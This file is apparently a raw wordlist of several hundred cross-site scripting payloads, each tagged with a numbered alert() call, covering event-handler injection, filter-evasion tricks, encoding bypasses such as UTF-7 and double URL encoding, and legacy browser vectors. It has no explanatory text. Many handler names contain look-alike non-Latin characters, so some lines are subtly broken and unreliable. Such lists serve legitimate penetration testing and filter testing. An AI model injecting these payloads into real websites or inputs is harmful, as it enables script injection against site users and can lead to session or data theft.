<svg/οnlοad=alert(738)
<input type="text" value=`` <div/οnmοuseοver='alert(740)'>X</div>
http://www.<script>alert(741)</script .com
<svg><script ?>alert(743)
<img src=`xx:xx`οnerrοr=alert(745)>
<meta http-equiv="refresh" content="0;javascript:alert(746)"/>
<script>+-+-756-+-+alert(756)</script>
<body/οnlοad=<!-->ᶒalert(757)>
<script itworksinallbrowsers>/*<script* */alert(758)</script
<img src ?itworksonchrome?\/onerror = alert(759)
<svg><script onlypossibleinopera:-)> alert(761)
<script x> alert(763) </script 763=2
<div/οnmοuseοver='alert(764)'> style="x:">
<--`<img/src=` οnerrοr=alert(765)> --!>
<div style="xg-p:absolute;top:0;left:0;width:76700%;height:76700%" οnmοuseοver="prompt(767)" οnclick="alert(767)">x</button>
<form><button formaction=javascript:alert(769)>CLICKME
‘;alert(775))//’;alert(775))//”;alert(775))//”;alert(775))//–></SCRIPT>”>’><SCRIPT>alert(775))</SCRIPT>
<IMG “””><SCRIPT>alert(776)</SCRIPT>”>
<IMG SRC=javascript:alert(777))>
<IMG SRC=”jav ascript:alert(778);”>
<IMG SRC=”jav ascript:alert(779);”>
<<SCRIPT>alert(780);//<</SCRIPT>
%253cscript%253ealert(781)%253c/script%253e
“><s”%2b”cript>alert(782)</script>
foo<script>alert(783)</script>
<scr<script>ipt>alert(784)</scr</script>ipt>
<BODY BACKGROUND=”javascript:alert(788)”>
<BODY ONLOAD=alert(789)>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(790);”>
<IMG SRC=”javascript:alert(791)”
javascript:alert(793)
<img src="javascript:alert(794);">
<img src=javascript:alert(795)>
<"';alert(796))//\';alert(796))//";alert(796))//\";alert(796))//--></SCRIPT>">'><SCRIPT>alert(796))</SCRIPT>
<IFRAME SRC="javascript:alert(798);"></IFRAME>
<<SCRIPT>alert(805);//<</SCRIPT>
<"';alert(806))//\';alert(806))//";alert(806))//\";alert(806))//--></SCRIPT>">'><SCRIPT>alert(806))</SCRIPT>
';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//--></SCRIPT>">'><SCRIPT>alert(807))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert(808)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<script>alert(809);</script>&search=1
0&q=';alert(810))//\';alert%2?8810))//";alert(String.fromCharCode?(88,83,83))//\";alert(810)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
<BODY ONLOAD=alert(812)>
<body οnscrοll=alert(815)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form><button formaction="javascript:alert(816)">lol
<!--<img src="--><img src=x οnerrοr=alert(817)//">
<![><img src="]><img src=x οnerrοr=alert(818)//">
<style><img src="</style><img src=x οnerrοr=alert(819)//">
<? foo="><script>alert(820)</script>">
<! foo="><script>alert(821)</script>">
</ foo="><script>alert(822)</script>">
<? foo="><x foo='?><script>alert(823)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(824)</script>">
<% foo><x foo="%><script>alert(825)</script>">
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(829)</script></svg>
<SCRIPT>alert(830)</SCRIPT>
\\";alert(831);//
</TITLE><SCRIPT>alert(832);</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert(833);\">
<BODY BACKGROUND=\"javascript:alert(834)\">
<BODY ONLOAD=alert(835)>
<IMG DYNSRC=\"javascript:alert(836)\">
<IMG LOWSRC=\"javascript:alert(837)\">
<BGSOUND SRC=\"javascript:alert(838);\">
<BR SIZE=\"&{alert(839)}\">
<LINK REL=\"stylesheet\" HREF=\"javascript:alert(841);\">
<STYLE>li {list-style-image: url(\"javascript:alert(847)\");}</STYLE><UL><LI>XSS
žscriptualert(851)ž/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(852);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(854);\"
<IFRAME SRC=\"javascript:alert(855);\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert(856);\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert(857)\">
<TABLE><TD BACKGROUND=\"javascript:alert(858)\">
<DIV STYLE=\"background-image: url(javascript:alert(859))\">
<DIV STYLE=\"background-image: url(javascript:alert(861))\">
<DIV STYLE=\"width: expression(alert(862));\">
<STYLE>@im\port'\ja\vasc\ript:alert(863)';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert(864))\">
<XSS STYLE=\"xss:expression(alert(865))\">
xss:ex/*XSS*//*/*/pression(alert(867))'>
<STYLE TYPE=\"text/javascript\">alert(868);</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert(869)\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(870)\")}</STYLE>
<SCRIPT>alert(872);</SCRIPT>
<BASE HREF=\"javascript:alert(874);//\">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(876)></OBJECT>
d=\"alert(882);\\")\";
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(885);\">]]>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert(887)\"></B></I></XML>
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert(894)</SCRIPT>\">
echo('IPT>alert(899)</SCRIPT>'); ?>
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert(902)</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert(903);+ADw-/SCRIPT+AD4-
<IMG SRC=\"javascript:alert(991)\"
<<SCRIPT>alert(994);//<</SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(996)>
<IMG SRC=\" javascript:alert(998);\">
perl -e 'print \"<SCR\0IPT>alert(999)</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(1000)>\";' > out
<IMG SRC=\"jav
ascript:alert(1001);\">
<IMG SRC=\"jav
ascript:alert(1002);\">
<IMG SRC=\"jav ascript:alert(1003);\">
<IMG SRC=javascript:alert(1006)>
<IMG SRC=javascript:alert(1007))>
<IMG \"\"\"><SCRIPT>alert(1008)</SCRIPT>\">
<IMG SRC=`javascript:alert(1009)`>
<IMG SRC=javascript:alert(1010)>
<IMG SRC=JaVaScRiPt:alert(1011)>
<IMG SRC=javascript:alert(1012)>
<IMG SRC=\"javascript:alert(1013);\">
';alert(1016))//\';alert(1016))//\";alert(1016))//\\";alert(1016))//--></SCRIPT>\">'><SCRIPT>alert(1016))</SCRIPT>
';alert(1017))//\';alert(1017))//";alert(1017))//\";alert(1017))//--></SCRIPT>">'><SCRIPT>alert(1017))</SCRIPT>
<IMG SRC="javascript:alert(1020);">
<IMG SRC=javascript:alert(1021)>
<IMG SRC=javascrscriptipt:alert(1022)>
<IMG SRC=JaVaScRiPt:alert(1023)>
<IMG """><SCRIPT>alert(1024)</SCRIPT>">
<IMG SRC="  javascript:alert(1025);">
<<SCRIPT>alert(1028);//<</SCRIPT>
<SCRIPT>a=/XSS/alert(1029)</SCRIPT>
\";alert(1030);//
</TITLE><SCRIPT>alert(1031);</SCRIPT>
¼script¾alert(1032)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1033);">
<IFRAME SRC="javascript:alert(1034);"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1035);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1036)">
<TABLE><TD BACKGROUND="javascript:alert(1037)">
<DIV STYLE="background-image: url(javascript:alert(1038))">
<DIV STYLE="width: expression(alert(1040));">
<STYLE>@im\port'\ja\vasc\ript:alert(1041)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1042))">
<XSS STYLE="xss:expression(alert(1043))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1044))'>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert(1048)</SCRIPT>"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:alert(1050)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(1051)">crosssitespt
<frameset οnlοad=alert(1052)>
<!--<img src="--><img src=x οnerrοr=alert(1053)//">
<style><img src="</style><img src=x οnerrοr=alert(1054)//">
<embed src="javascript:alert(1057)">
<? foo="><script>alert(1058)</script>">
<! foo="><script>alert(1059)</script>">
</ foo="><script>alert(1060)</script>">
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1062)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1063)')()</script>
<script src="#">{alert(1064)}</script>;1064
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1065)',384,null,'rsa-dual-use')</script>
<svg xmlns="#"><script>alert(1066)</script></svg>
<svg οnlοad="javascript:alert(1067)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1068)"></iframe>
+ADw-script+AD4-alert(1069)+ADw-/script+AD4-
%2BADw-script+AD4-alert(1070)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(1071)+ADw-/script+AD4APAAi-
%253cscript%253ealert(1073)%253c/script%253e
“><s”%2b”cript>alert(1074)</script>
“><ScRiPt>alert(1075)</script>
“><<script>alert(1076);//<</script>
foo<script>alert(1077)</script>
<scr<script>ipt>alert(1078)</scr</script>ipt>
‘; alert(1080); var foo=’
foo\’; alert(1081);//’;
</script><script >alert(1082)</script>
<img src=asdf οnerrοr=alert(1083)>
<BODY ONLOAD=alert(1084)>
<script>alert(1085)</script>
"><script>alert(1086))</script>
<video src=1087 οnerrοr=alert(1087)>
<audio src=1088 οnerrοr=alert(1088)>
';alert(1089))//';alert(1089))//";alert(1089))//";alert(1089))//--></SCRIPT>">'><SCRIPT>alert(1089))</SCRIPT>
0\"autofocus/οnfοcus=alert(1091)--><video/poster/οnerrοr=prompt(2)>"-confirm(3)-"
<IMG SRC="javascript:alert(1097);">
<IMG SRC=javascript:alert(1098)>
<IMG SRC=JaVaScRiPt:alert(1099)>
<IMG SRC=javascript:alert(1100)>
<IMG SRC=`javascript:alert(1101)`>
<a οnmοuseοver="alert(1102)">xxs link</a>
<a οnmοuseοver=alert(1103)>xxs link</a>
<IMG """><SCRIPT>alert(1104)</SCRIPT>">
<IMG SRC=javascript:alert(1105))>
<IMG SRC=# οnmοuseοver="alert(1106)">
<IMG SRC= οnmοuseοver="alert(1107)">
<IMG οnmοuseοver="alert(1108)">
<IMG SRC=/ οnerrοr="alert(1109))"></img>
<IMG SRC="jav ascript:alert(1115);">
<IMG SRC="jav ascript:alert(1116);">
<IMG SRC="jav
ascript:alert(1117);">
<IMG SRC="jav
ascript:alert(1118);">
<IMG SRC="  javascript:alert(1119);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1121)>
<<SCRIPT>alert(1123);//<</SCRIPT>
<IMG SRC="javascript:alert(1126)"
\";alert(1128);//
</script><script>alert(1129);</script>
</TITLE><SCRIPT>alert(1130);</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1131);">
<BODY BACKGROUND="javascript:alert(1132)">
<IMG DYNSRC="javascript:alert(1133)">
<IMG LOWSRC="javascript:alert(1134)">
<STYLE>li {list-style-image: url("javascript:alert(1135)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert(1138)>
<BGSOUND SRC="javascript:alert(1139);">
<BR SIZE="&{alert(1140)}">
<LINK REL="stylesheet" HREF="javascript:alert(1141);">
<STYLE>@im\port'\ja\vasc\ript:alert(1146)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1147))">
xss:ex/*XSS*//*/*/pression(alert(1149))'>
<STYLE TYPE="text/javascript">alert(1150);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(1151)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(1152)")}</STYLE>
<XSS STYLE="xss:expression(alert(1153))">
¼script¾alert(1155)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1156);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1158);">
<IFRAME SRC="javascript:alert(1159);"></IFRAME>
<IFRAME SRC=# οnmοuseοver="alert(1160)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1161);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1162)">
<TABLE><TD BACKGROUND="javascript:alert(1163)">
<DIV STYLE="background-image: url(javascript:alert(1164))">
<DIV STYLE="background-image: url(javascript:alert(1166))">
<DIV STYLE="width: expression(alert(1167));">
<!--[if gte IE 4]><SCRIPT>alert(1168);</SCRIPT><![endif]-->
<BASE HREF="javascript:alert(1169);//">
<? echo('<SCR)';echo('IPT>alert(1172)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1174)</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1175);+ADw-/SCRIPT+AD4-
0\"autofocus/οnfοcus=alert(1184)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/οnlοad=alert(1185)//
#"><img src=M οnerrοr=alert(1186);>
element[attribute='<img src=x οnerrοr=alert(1187);>
[<blockquote cite="]">[" οnmοuseοver="alert(1188);" ]
<scr<script>ipt>alert(1195)</scr</script>ipt><scr<script>ipt>alert(1195)</scr</script>ipt>
<sCR<script>iPt>alert(1196)</SCr</script>IPt>
%253Cscript%253Ealert(1198)%253C%252Fscript%253E
<IMG SRC=x οnlοad="alert(1199))">
<IMG SRC=x οnafterprint="alert(1200))">
<IMG SRC=x οnbefοreprint="alert(1201))">
<IMG SRC=x οnbefοreunlοad="alert(1202))">
<IMG SRC=x οnerrοr="alert(1203))">
<IMG SRC=x οnhashchange="alert(1204))">
<IMG SRC=x οnlοad="alert(1205))">
<IMG SRC=x onmessage="alert(1206))">
<IMG SRC=x οnοnline="alert(1207))">
<IMG SRC=x οnοffline="alert(1208))">
<IMG SRC=x οnpagehide="alert(1209))">
<IMG SRC=x οnpageshοw="alert(1210))">
<IMG SRC=x onpopstate="alert(1211))">
<IMG SRC=x οnresize="alert(1212))">
<IMG SRC=x onstorage="alert(1213))">
<IMG SRC=x οnunlοad="alert(1214))">
<IMG SRC=x οnblur="alert(1215))">
<IMG SRC=x οnchange="alert(1216))">
<IMG SRC=x οncοntextmenu="alert(1217))">
<IMG SRC=x οninput="alert(1218))">
<IMG SRC=x oninvalid="alert(1219))">
<IMG SRC=x οnreset="alert(1220))">
<IMG SRC=x οnsearch="alert(1221))">
<IMG SRC=x οnselect="alert(1222))">
<IMG SRC=x οnsubmit="alert(1223))">
<IMG SRC=x οnkeydοwn="alert(1224))">
<IMG SRC=x οnkeypress="alert(1225))">
<IMG SRC=x οnkeyup="alert(1226))">
<IMG SRC=x οnclick="alert(1227))">
<IMG SRC=x οndblclick="alert(1228))">
<IMG SRC=x οnmοusedοwn="alert(1229))">
<IMG SRC=x οnmοusemοve="alert(1230))">
<IMG SRC=x οnmοuseοut="alert(1231))">
<IMG SRC=x οnmοuseοver="alert(1232))">
<IMG SRC=x οnmοuseup="alert(1233))">
<IMG SRC=x onmousewheel="alert(1234))">
<IMG SRC=x οnwheel="alert(1235))">
<IMG SRC=x οndrag="alert(1236))">
<IMG SRC=x οndragend="alert(1237))">
<IMG SRC=x οndragenter="alert(1238))">
<IMG SRC=x οndragleave="alert(1239))">
<IMG SRC=x οndragοver="alert(1240))">
<IMG SRC=x οndragstart="alert(1241))">
<IMG SRC=x οndrοp="alert(1242))">
<IMG SRC=x οnscrοll="alert(1243))">
<IMG SRC=x οncοpy="alert(1244))">
<IMG SRC=x oncut="alert(1245))">
<IMG SRC=x οnpaste="alert(1246))">
<IMG SRC=x οnabοrt="alert(1247))">
<IMG SRC=x οncanplay="alert(1248))">
<IMG SRC=x oncanplaythrough="alert(1249))">
<IMG SRC=x oncuechange="alert(1250))">
<IMG SRC=x onduratiοnchange="alert(1251))">
<IMG SRC=x onemptied="alert(1252))">
<IMG SRC=x οnended="alert(1253))">
<IMG SRC=x οnerrοr="alert(1254))">
<IMG SRC=x οnlοadeddata="alert(1255))">
<IMG SRC=x onloadedmetadata="alert(1256))">
<IMG SRC=x οnlοadstart="alert(1257))">
<IMG SRC=x οnpause="alert(1258))">
<IMG SRC=x οnplay="alert(1259))">
<IMG SRC=x οnplaying="alert(1260))">
<IMG SRC=x οnprοgress="alert(1261))">
<IMG SRC=x οnratechange="alert(1262))">
<IMG SRC=x οnseeked="alert(1263))">
<IMG SRC=x οnseeking="alert(1264))">
<IMG SRC=x οnstalled="alert(1265))">
<IMG SRC=x οnsuspend="alert(1266))">
<IMG SRC=x οntimeupdate="alert(1267))">
<IMG SRC=x οnvοlumechange="alert(1268))">
<IMG SRC=x οnwaiting="alert(1269))">
<IMG SRC=x οnshοw="alert(1270))">
<IMG SRC=x οntοggle="alert(1271))">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1272)";
<IMG SRC=x οnlοad="alert(1273))">
<INPUT TYPE="BUTTON" action="alert(1274)"/>
"><h1><IFRAME SRC="javascript:alert(1275);"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# οnmοuseοver="alert(1276)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert(1277);"></IFRAME>
<IFRAME SRC=# οnmοuseοver="alert(1278)"></IFRAME>
"><h1><IFRAME SRC=# οnmοuseοver="alert(1279)"></IFRAME>123</h1>
"></iframe><script>alert(1280);</script><iframe frameborder="0%EF%BB%BF
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" οnmοuseοver="alert(1281)"></IFRAME>123</h1>
<IFRAME width="420" height="315" frameborder="0" οnlοad="alert(1285)"></IFRAME>
"><h1><IFRAME SRC="javascript:alert(1286);"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# οnmοuseοver="alert(1287)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert(1289);"></IFRAME>
<IFRAME SRC=# οnmοuseοver="alert(1290)"></IFRAME>
<img src=``
 οnerrοr=alert(1297)

<script /**/>/**/alert(1301)/**/</script /**/
<iframe/src="data:text/html,<svg ��load=alert(1303)>">
<meta content="
 1304 
; JAVASCRIPT: alert(1304)" http-equiv="refresh"/>
<form><iframe ㌶� src="javascript:alert(1311)"�㌶ ;>
http://www.google<script .com>alert(1313)</script
<script ^__^>alert(1317))</script ^__^
</style ><script :-(>/**/alert(1318)/**/</script :-(
�</form><input type"date" οnfοcus="alert(1319)">
<a href="javascript:void(0)" οnmοuseοver=
javascript:alert(1323)
>X</a>
<script ~~~>alert(1324)</script ~~~>
<iframe// src=javaSCRIPT:alert(1332)
<%<!--'%><script>alert(1349);</script -->
<script src="data:text/javascript,alert(1350)"></script>
<iframe/onreadystatechange=alert(1352)
<svg/οnlοad=alert(1353)
<input type="text" value=`` <div/οnmοuseοver='alert(1355)'>X</div>
http://www.<script>alert(1356)</script .com
<svg><script ?>alert(1358)
<img src=`xx:xx`οnerrοr=alert(1360)>
<meta http-equiv="refresh" content="0;javascript:alert(1362)"/>
<script>+-+-1372-+-+alert(1372)</script>
<body/οnlοad=<!-->㖢alert(1373)>
<script itworksinallbrowsers>/*<script* */alert(1374)</script
<img src ?itworksonchrome?\/onerror = alert(1375)
<svg><script onlypossibleinopera:-)> alert(1377)
<script x> alert(1379) </script 1379=2
<div/οnmοuseοver='alert(1380)'> style="x:">
<--`<img/src=` οnerrοr=alert(1381)> --!>
<div style="position:absolute;top:0;left:0;width:138300%;height:138300%" οnmοuseοver="prompt(1383)" οnclick="alert(1383)">x</button>
<form><button formaction=javascript:alert(1385)>CLICKME
<script\x20type="text/javascript">javascript:alert(1390);</script>
<script\x3Etype="text/javascript">javascript:alert(1391);</script>
<script\x0Dtype="text/javascript">javascript:alert(1392);</script>
<script\x09type="text/javascript">javascript:alert(1393);</script>
<script\x0Ctype="text/javascript">javascript:alert(1394);</script>
<script\x2Ftype="text/javascript">javascript:alert(1395);</script>
<script\x0Atype="text/javascript">javascript:alert(1396);</script>
'`"><\x3Cscript>javascript:alert(1397)</script>
'`"><\x00script>javascript:alert(1398)</script>
<img src=1399 href=1399 οnerrοr="javascript:alert(1399)"></img>
<audio src=1400 href=1400 οnerrοr="javascript:alert(1400)"></audio>
<video src=1401 href=1401 οnerrοr="javascript:alert(1401)"></video>
<body src=1402 href=1402 οnerrοr="javascript:alert(1402)"></body>
<image src=1403 href=1403 οnerrοr="javascript:alert(1403)"></image>
<object src=1404 href=1404 οnerrοr="javascript:alert(1404)"></object>
<script src=1405 href=1405 οnerrοr="javascript:alert(1405)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1406)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1407)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1408)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1409)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1410)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1411)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1412)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1413)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1414)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1415)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1416)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1417)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1418)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1419)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1420)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1421)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1422)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1423)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1424)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1425)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1426)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1427)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(1428)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1429)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1430)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1431)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1432)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1433)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1434)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(1435)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1436)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1437)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1438)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1439)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1440)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1441)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1442)"></body onResize>
<object onError object onError="javascript:javascript:alert(1443)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1444)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1445)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1446)"></applet onreadystatechange>
<body onpagehide body οnpagehide="javascript:javascript:alert(1447)"></body onpagehide>
<svg onunload svg οnunlοad="javascript:javascript:alert(1448)"></svg onunload>
<applet onerror applet οnerrοr="javascript:javascript:alert(1449)"></applet onerror>
<body onkeyup body οnkeyup="javascript:javascript:alert(1450)"></body onkeyup>
<body onunload body οnunlοad="javascript:javascript:alert(1451)"></body onunload>
<iframe onload iframe οnlοad="javascript:javascript:alert(1452)"></iframe onload>
<body onload body οnlοad="javascript:javascript:alert(1453)"></body onload>
<html onmouseover html οnmοuseοver="javascript:javascript:alert(1454)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1455)"></object onbeforeload>
<body onbeforeunload body οnbefοreunlοad="javascript:javascript:alert(1456)"></body onbeforeunload>
<body onfocus body οnfοcus="javascript:javascript:alert(1457)"></body onfocus>
<body onkeydown body οnkeydοwn="javascript:javascript:alert(1458)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1459)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1460)"></iframe src>
<svg onload svg οnlοad="javascript:javascript:alert(1461)"></svg onload>
<html onmousemove html οnmοusemοve="javascript:javascript:alert(1462)"></html onmousemove>
<body onblur body οnblur="javascript:javascript:alert(1463)"></body onblur>
\x3Cscript>javascript:alert(1464)</script>
'"`><script>/* *\x2Fjavascript:alert(1465)// */</script>
<script>javascript:alert(1466)</script\x0D
<script>javascript:alert(1467)</script\x0A
<script>javascript:alert(1468)</script\x0B
<script charset="\x22>javascript:alert(1469)</script>
<!--\x3E<img src=xxx:x οnerrοr=javascript:alert(1470)> -->
--><!-- ---> <img src=xxx:x οnerrοr=javascript:alert(1471)> -->
--><!-- --\x00> <img src=xxx:x οnerrοr=javascript:alert(1472)> -->
--><!-- --\x21473> <img src=xxx:x οnerrοr=javascript:alert(1473)> -->
--><!-- --\x3E> <img src=xxx:x οnerrοr=javascript:alert(1474)> -->
`"'><img src='#\x27 οnerrοr=javascript:alert(1475)>
<a href="javascript\x3Ajavascript:alert(1476)" id="fuzzelement1476">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1477)//';</script></p>
<a href="javas\x00cript:javascript:alert(1478)" id="fuzzelement1478">test</a>
<a href="javas\x07cript:javascript:alert(1479)" id="fuzzelement1479">test</a>
<a href="javas\x0Dcript:javascript:alert(1480)" id="fuzzelement1480">test</a>
<a href="javas\x0Acript:javascript:alert(1481)" id="fuzzelement1481">test</a>
<a href="javas\x08cript:javascript:alert(1482)" id="fuzzelement1482">test</a>
<a href="javas\x02cript:javascript:alert(1483)" id="fuzzelement1483">test</a>
<a href="javas\x03cript:javascript:alert(1484)" id="fuzzelement1484">test</a>
<a href="javas\x04cript:javascript:alert(1485)" id="fuzzelement1485">test</a>
<a href="javas\x01486cript:javascript:alert(1486)" id="fuzzelement1486">test</a>
<a href="javas\x05cript:javascript:alert(1487)" id="fuzzelement1487">test</a>
<a href="javas\x0Bcript:javascript:alert(1488)" id="fuzzelement1488">test</a>
<a href="javas\x09cript:javascript:alert(1489)" id="fuzzelement1489">test</a>
<a href="javas\x06cript:javascript:alert(1490)" id="fuzzelement1490">test</a>
<a href="javas\x0Ccript:javascript:alert(1491)" id="fuzzelement1491">test</a>
<script>/* *\x2A/javascript:alert(1492)// */</script>
<script>/* *\x00/javascript:alert(1493)// */</script>
<style></style\x3E<img src="about:blank" οnerrοr=javascript:alert(1494)//></style>
<style></style\x0D<img src="about:blank" οnerrοr=javascript:alert(1495)//></style>
<style></style\x09<img src="about:blank" οnerrοr=javascript:alert(1496)//></style>
<style></style\x20<img src="about:blank" οnerrοr=javascript:alert(1497)//></style>
<style></style\x0A<img src="about:blank" οnerrοr=javascript:alert(1498)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1499);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1500);/*';">DEF
<script>if("x\\xE1501\x96\x89".length==2) { javascript:alert(1501);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1502);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1503);}</script>
'`"><\x3Cscript>javascript:alert(1504)</script>
'`"><\x00script>javascript:alert(1505)</script>
"'`><\x3Cimg src=xxx:x οnerrοr=javascript:alert(1506)>
"'`><\x00img src=xxx:x οnerrοr=javascript:alert(1507)>
<script src="data:text/plain\x2Cjavascript:alert(1508)"></script>
<script src="data:\xD4\x8F,javascript:alert(1509)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1510)"></script>
<script src="data:\xCB\x8F,javascript:alert(1511)"></script>
<script\x20type="text/javascript">javascript:alert(1512);</script>
<script\x3Etype="text/javascript">javascript:alert(1513);</script>
<script\x0Dtype="text/javascript">javascript:alert(1514);</script>
<script\x09type="text/javascript">javascript:alert(1515);</script>
<script\x0Ctype="text/javascript">javascript:alert(1516);</script>
<script\x2Ftype="text/javascript">javascript:alert(1517);</script>
<script\x0Atype="text/javascript">javascript:alert(1518);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1519)">DEF
